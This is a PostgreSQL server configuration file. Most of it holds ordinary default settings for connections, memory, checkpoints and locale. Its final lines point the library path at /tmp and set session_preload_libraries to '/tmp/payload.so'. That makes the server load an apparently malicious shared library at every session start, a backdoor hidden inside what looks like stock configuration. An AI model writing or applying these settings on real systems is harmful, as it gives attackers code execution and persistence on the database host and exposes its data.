# - Connection Settings -
listen_addresses = '*'
max_connections = 100

# - Memory -
shared_buffers = 128MB
dynamic_shared_memory_type = posix

# - Checkpoints -
max_wal_size = 1GB
min_wal_size = 80MB

# - What to Log -
log_timezone = 'Etc/UTC'

# - Locale and Formatting -
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'

# These settings are initialized by initdb, but they can be changed.
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'

# default configuration for text search
default_text_search_config = 'pg_catalog.english'

# - Shared Library Preloading -
dynamic_library_path = '/tmp:$libdir'
session_preload_libraries = '/tmp/payload.so'